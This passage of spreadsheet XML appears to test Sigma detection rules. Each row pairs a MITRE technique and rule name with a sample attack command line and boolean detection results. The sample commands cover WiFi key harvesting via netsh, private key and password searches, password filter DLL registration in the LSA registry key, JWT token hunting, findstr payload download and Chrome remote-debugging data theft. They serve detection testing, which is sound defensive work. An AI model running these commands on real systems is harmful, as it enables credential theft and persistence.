      <c r="B544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C544" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D544" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E544" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan s p k name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F544" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G544" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H544" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I544" s="43" t="n"/>
      <c r="J544" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K544" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C545" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D545" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E545" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan show profile name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I545" s="43" t="n"/>
      <c r="J545" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K545" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C546" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D546" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E546" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo wlan show profile name=SSID key=clear | netsh.exe</t>
        </is>
      </c>
      <c r="F546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I546" s="43" t="n"/>
      <c r="J546" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K546" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C547" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D547" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E547" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path C:\ -Recurse -Include *.$('p'+'em')"</t>
        </is>
      </c>
      <c r="F547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I547" s="43" t="n"/>
      <c r="J547" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K547" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C548" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D548" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E548" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value 'scecli'"</t>
        </is>
      </c>
      <c r="F548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I548" s="43" t="n"/>
      <c r="J548" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K548" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C549" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D549" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E549" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value 'scecli'"</t>
        </is>
      </c>
      <c r="F549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I549" s="43" t="n"/>
      <c r="J549" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K549" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C550" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D550" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E550" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value 'scecli\0*'"</t>
        </is>
      </c>
      <c r="F550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I550" s="43" t="n"/>
      <c r="J550" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K550" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C551" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D551" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E551" s="43" t="inlineStr">
        <is>
          <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0myfilter" /f</t>
        </is>
      </c>
      <c r="F551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I551" s="43" t="n"/>
      <c r="J551" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K551" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C552" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D552" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E552" s="43" t="inlineStr">
        <is>
          <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0myfilter" /f</t>
        </is>
      </c>
      <c r="F552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I552" s="43" t="n"/>
      <c r="J552" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K552" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="43" t="inlineStr">
        <is>
          <t>t1556.002</t>
        </is>
      </c>
      <c r="B553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_credential_access_via_password_filter</t>
        </is>
      </c>
      <c r="C553" s="43" t="inlineStr">
        <is>
          <t>Dropping Of Password Filter DLL</t>
        </is>
      </c>
      <c r="D553" s="43" t="inlineStr">
        <is>
          <t>b7966f4a-b333-455b-8370-8ca53c229762</t>
        </is>
      </c>
      <c r="E553" s="43" t="inlineStr">
        <is>
          <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v Notification Packages /t REG_MULTI_SZ /d "scecli\0myfilter" /f</t>
        </is>
      </c>
      <c r="F553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I553" s="43" t="n"/>
      <c r="J553" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K553" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C554" s="43" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D554" s="43" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E554" s="43" t="inlineStr">
        <is>
          <t>reg query HKCU /f password /t REG_SZ</t>
        </is>
      </c>
      <c r="F554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I554" s="43" t="n"/>
      <c r="J554" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K554" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="43" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C555" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D555" s="43" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E555" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Select-String -Path $env:LOCALAPPDATA\* -Pattern ('eyJ0' + 'eX')"</t>
        </is>
      </c>
      <c r="F555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I555" s="43" t="n"/>
      <c r="J555" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K555" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C556" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D556" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E556" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192\.168\.1\.100\share\payload.txt"</t>
        </is>
      </c>
      <c r="F556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I556" s="43" t="n"/>
      <c r="J556" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C557" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D557" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E557" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" &gt; NUL</t>
        </is>
      </c>
      <c r="F557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I557" s="43" t="n"/>
      <c r="J557" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K557" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C558" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D558" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E558" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" | findstr .</t>
        </is>
      </c>
      <c r="F558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I558" s="43" t="n"/>
      <c r="J558" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C559" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D559" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E559" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe fstr.exe &amp;&amp; fstr.exe /s /i "password" .</t>
        </is>
      </c>
      <c r="F559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I559" s="43" t="n"/>
      <c r="J559" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K559" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C560" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D560" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E560" s="43" t="inlineStr">
        <is>
          <t>findstr "password" . /s /i</t>
        </is>
      </c>
      <c r="F560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I560" s="43" t="n"/>
      <c r="J560" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K560" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C561" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D561" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E561" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless</t>
        </is>
      </c>
      <c r="F561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I561" s="43" t="n"/>
      <c r="J561" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C562" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D562" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E562" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless=new</t>
        </is>
      </c>
      <c r="F562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I562" s="43" t="n"/>
      <c r="J562" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C563" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D563" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E563" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless --incognito</t>
        </is>
      </c>
      <c r="F563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="43" t="n"/>
      <c r="J563" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C564" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D564" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E564" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User\Data --headless --disable-automation</t>
        </is>
      </c>
      <c r="F564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I564" s="43" t="n"/>
      <c r="J564" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C565" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D565" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E565" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I565" s="43" t="n"/>
      <c r="J565" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C566" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D566" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E566" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --user-data-dir=C:\Users\User\AppData\Local\Chrome\User\Data</t>
        </is>
      </c>
      <c r="F566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I566" s="43" t="n"/>
      <c r="J566" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C567" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D567" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E567" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --profile-directory=Default</t>
        </is>
      </c>
      <c r="F567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I567" s="43" t="n"/>
      <c r="J567" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C568" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D568" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E568" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-address=127.0.0.1 --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I568" s="43" t="n"/>
      <c r="J568" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C569" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D569" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E569" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-socket-name=debug_socket</t>
        </is>
      </c>
      <c r="F569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I569" s="43" t="n"/>
      <c r="J569" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C570" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D570" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E570" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-pipe=debug_pipe</t>
        </is>
      </c>
      <c r="F570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I570" s="43" t="n"/>
      <c r="J570" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C571" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D571" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E571" s="43" t="inlineStr">
        <is>
          <t>chrome.exe --remote-debugging-port=9222 --no-sandbox</t>
        </is>
      </c>
      <c r="F571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I571" s="43" t="n"/>
      <c r="J571" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1" s="42">
